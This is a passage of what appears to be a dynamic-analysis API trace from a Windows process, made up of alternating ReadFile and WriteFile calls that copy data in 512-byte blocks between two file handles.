ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.668] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.668] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.669] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.669] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.670] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.670] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.671] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.671] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.672] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.672] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.673] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.673] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.674] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.674] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.675] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.675] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.676] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.676] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.677] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.677] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.678] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.679] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.679] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.680] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.680] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.681] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.681] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.682] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.682] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.683] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.683] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.684] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.684] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.685] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.685] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.686] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.686] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.687] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.687] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.688] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.688] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.689] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.689] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.690] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.690] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.690] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.691] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.692] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.692] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.693] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.693] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.693] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.694] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.694] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.695] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.695] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.696] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.696] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.697] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.697] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.698] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.698] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.699] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.699] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.700] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.700] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.701] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.701] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.702] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.702] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.703] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.703] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.704] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.704] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.705] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.705] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.706] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.706] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.707] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.707] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.708] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.708] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.709] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.709] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.710] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.710] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.711] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.711] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.712] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.712] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.713] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.713] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.714] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.714] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.715] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.715] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.716] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.716] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.717] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.717] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, 